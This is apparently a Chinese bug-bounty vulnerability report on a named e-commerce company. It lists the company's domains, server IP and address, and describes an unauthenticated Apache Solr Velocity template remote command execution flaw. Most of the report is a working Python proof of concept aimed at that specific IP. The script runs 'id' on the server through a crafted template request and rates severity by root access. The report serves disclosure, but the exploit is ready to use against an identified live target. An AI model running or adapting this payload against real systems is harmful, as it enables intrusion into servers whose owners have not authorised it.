厂商名称：广东金秋电子商务有限公司
所属SRC：互联网空间-亿万守护计划
漏洞标题：xxx网站存在命令执行
漏洞类别：web
漏洞类型: 事件型
利用通用漏洞：是
组件名称：'Apache Solr 5.0.0 ~ 8.3.1
漏洞等级：严重
漏洞url：https://vip.jinqiuds.com:5258 https://jinqiuds.com:5258 https://m.shengqianzhan.net:5258 https://www.jinqiuds.com:5258
网站名称：广东金秋电子商务有限公司
网站ip：123.207.23.211
所属地区：梅州市梅江区丽都西路12号
漏洞描述：攻击者通过未授权访问solr服务器，发送特定的数据包开启 params.resource.loader.enabled，然后get访问接口导致服务器命令执行。
公司业务：网上销售产品、软件开发与设计、网络工程、企业信息化管理、网站设计与开发、网页制作、通信系统开发集成、电子商务、自动化控制系统开发与集成、技术咨询服务与培训；网上销售食品、化妆品、日用百货、家用电器、服装鞋帽、文体用品、户外活动用品；电子产品销售，钟表与计时仪器销售。(依法须经批准的项目，经相关部门批准后方可开展经营活动)
复现步骤：
# -*- coding: UTF-8 -*-
import requests

host = 'https://123.207.23.211:5258'
if host[-1] == '/':
    host = host[:-1]

def poc(target_url):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    check_url = target_url + '/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
    }
    try:
        response = requests.get(url=check_url, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'uid=0' in response.text and 'gid' in response.text:
            # set info['LEVEL']:str and info['vulnable']:int as the return
            print('严重')
        elif response.status_code == 200 and 'uid' in response.text and 'gid' in response.text:
            # set info['LEVEL']:str and info['vulnable']:int as the return
            print('高危')
    except:
        print('error {0}'.format(target_url))

poc(host)
        
修复方案：升级Apache Solr版本